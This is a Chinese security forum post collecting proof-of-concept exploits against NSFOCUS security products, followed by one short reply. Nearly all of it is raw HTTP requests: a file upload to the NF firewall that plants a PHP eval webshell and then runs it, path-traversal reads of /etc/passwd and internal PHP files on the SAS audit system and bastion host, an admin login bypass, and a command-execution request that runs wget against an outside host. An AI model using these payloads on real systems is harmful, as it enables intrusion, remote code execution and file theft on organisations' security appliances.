请选择 进入手机版 | 继续访问电脑版

DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 3526|回复: 1

[2023HW] 绿盟漏洞 PoC 整理

[复制链接]

172

主题

34

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
339
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2023-8-16 21:54:03 | 显示全部楼层 |阅读模式
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!

绿盟 NF 下一代防火墙任意文件上传漏洞


  1. POST /api/v1/device/bugsInfo HTTP/1.1
  2. Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
  3. Host:
  4. --4803b59d015026999b45993b1245f0ef
  5. Content-Disposition: form-data; name="file"; filename="compose.php"
  6. <?php eval($_POST['cmd']);?>
  7. --4803b59d015026999b45993b1245f0ef--
  8. POST /mail/include/header_main.php HTTP/1.1
  9. Content-Type: application/x-www-form-urlencoded
  10. Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71
  11. Host:
  12. cmd=phpinfo();
复制代码

绿盟 sas 安全审计系统任意文件读取


  1. /webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd
  2. GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
  3. Host: xxx.xxx.xxx.xxx:port
  4. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
  5. Accept-Encoding: gzip, deflate
  6. Connection: close
复制代码

绿盟 SAS 堡垒机 Exec 远程命令执行漏洞


  1. GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1
  2. Host: xxx.xxx.xxx.xxx:port
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
  4. Content-Type: application/x-www-form-urlencoded
  5. Accept-Encoding: gzip, deflate
  6. Connection: close
复制代码

绿盟 SAS 堡垒机 GetFile 任意文件读取漏洞


通过漏洞包含 www/local_user.php 实现任意⽤户登录

  1. /webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd
复制代码

绿盟 SAS 堡垒机 local_user.php 任意用户登录漏洞


  1. /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin
复制代码

0

主题

11

回帖

0

荣誉

Rank: 1

UID
1429
积分
2
精华
0
沃币
9 枚
注册时间
2023-8-10
发表于 2023-9-4 13:44:26 | 显示全部楼层
任意文件读取的漏洞,我们发现并已经改了
产权交易 https://www.ejy365.com
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

1楼
2楼

Archiver|小黑屋|DecoyMini 技术交流社区 ( 京ICP备2021005070号 )

GMT+8, 2024-5-23 17:00 , Processed in 0.063580 second(s), 37 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表